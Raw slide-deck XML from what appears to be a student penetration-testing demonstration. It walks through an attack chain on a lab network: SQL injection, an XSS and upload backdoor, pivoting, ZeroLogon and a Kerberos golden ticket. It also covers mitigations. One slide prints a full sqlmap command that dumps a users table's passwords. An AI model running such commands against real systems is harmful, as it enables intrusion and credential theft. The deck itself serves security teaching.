            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665590" y="154935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From here we can see that we can access the kerberos golden ticket.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1158" name="Google Shape;1158;gba014e31c3_1_21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="251275" y="2834788"/>
            <a:ext cx="4320725" cy="3075525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1159" name="Google Shape;1159;gba014e31c3_1_21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4583797" y="2786550"/>
            <a:ext cx="4320725" cy="31719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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7781925" cy="60483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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Prototype Walk Through / Demonstration </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Google Shape;267;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113225" y="1893325"/>
            <a:ext cx="8863500" cy="49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The story of our exploits:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Story 1:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>We start by Scanning the web server for any vulnerability (Nmap, OWASP,  Burp Suite)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>SQL Injection, SQLmap to check website and gain to the admin account</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Use file upload and XSS to gain backdoor (www-data)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Privilege escalation (www-data → Root)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Do a network scanning</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Pivoting to email server</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Pivoting to file server</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Buffer overflow to get the secret formula</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Story 2:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>We start by do a recon of the network and found AD server</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Exploit AD using ZeroLogon</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Cracking the NTLM hashes</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Kerberos Golden ticket from Windows 10</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Infiltrate to AD server then infiltrate to CEO Machine via shared folder</a:t>
            </a:r>
            <a:endParaRPr sz="18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a965f9fa50_0_0"/>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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;274;ga965f9fa50_0_0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="275" name="Google Shape;275;ga965f9fa50_0_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665171" y="1651000"/>
            <a:ext cx="3811600" cy="1639800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="276" name="Google Shape;276;ga965f9fa50_0_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3172525"/>
            <a:ext cx="8839201" cy="716252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;ga965f9fa50_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903450" y="4098275"/>
            <a:ext cx="73371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When inputting ‘ into the form, we can see that it returns an error message about the SQL syntax so this shows it is possible for SQL Injection as no validation of user input is happening.</a:t>
            </a:r>
            <a:endParaRPr sz="18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b250758a83_2_0"/>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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="284" name="Google Shape;284;gb250758a83_2_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1976725"/>
            <a:ext cx="8839200" cy="375249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;gb250758a83_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903450" y="2644050"/>
            <a:ext cx="73371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We use this command to find out what tables are in the database c200</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Google Shape;286;gb250758a83_2_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2332200" y="3109463"/>
            <a:ext cx="4448175" cy="2695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a965f9fa50_0_10"/>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SQL Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="293" name="Google Shape;293;ga965f9fa50_0_10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735225" y="4701250"/>
            <a:ext cx="7025001" cy="2168525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="294" name="Google Shape;294;ga965f9fa50_0_10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="246225" y="1733088"/>
            <a:ext cx="3409950" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Google Shape;295;ga965f9fa50_0_10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800775" y="1966500"/>
            <a:ext cx="43416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Using SQL Injection, we are able to find the details of the </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database used (MYSQL),the name of the database (c200), </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and the details of their users table</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="Google Shape;296;ga965f9fa50_0_10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735225" y="3732200"/>
            <a:ext cx="73371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Command used to enumerate and dump retrieved records of their users table is</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a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>“sqlmap -u "http://www.cool4guys.com/doLogin.php?username=irfan&amp;password=password1" -D c200  -T users -C username,password --dump”</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b280c43d12_1_47"/>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SQL Injection (Mitigation)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="303" name="Google Shape;303;gb280c43d12_1_47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="1927125"/>
            <a:ext cx="7029450" cy="809625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="Google Shape;304;gb280c43d12_1_47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378700" y="3001050"/>
            <a:ext cx="36024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This function will escape special characters</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="305" name="Google Shape;305;gb280c43d12_1_47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="945625" y="3959750"/>
            <a:ext cx="2951861" cy="1142900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Google Shape;306;gb280c43d12_1_47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4131350" y="4103250"/>
            <a:ext cx="38670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When trying to dump enumerated and retrieved</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records in users table, we are not able</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to retrieve them</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a96dc51dba_0_63"/>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Mitigation from the Website (File Upload)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;ga96dc51dba_0_63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665590" y="154935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Outdated:</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>Updated:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="314" name="Google Shape;314;ga96dc51dba_0_63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15547"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2065775" y="1701775"/>
            <a:ext cx="6846675" cy="1966225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="Google Shape;315;ga96dc51dba_0_63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="4699" b="14837"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2065775" y="4050632"/>
            <a:ext cx="7078225" cy="2311468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="316" name="Google Shape;316;ga96dc51dba_0_63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385775" y="4000500"/>
            <a:ext cx="87726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a96dc51dba_0_72"/>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Mitigation from the Website (Forum_XSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;ga96dc51dba_0_72"/>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Outdated:</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>Updated:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="324" name="Google Shape;324;ga96dc51dba_0_72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3571876" y="1497850"/>
            <a:ext cx="4101149" cy="2530225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="325" name="Google Shape;325;ga96dc51dba_0_72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3571875" y="4028075"/>
            <a:ext cx="4488226" cy="2757375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="326" name="Google Shape;326;ga96dc51dba_0_72"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="714375" y="3943250"/>
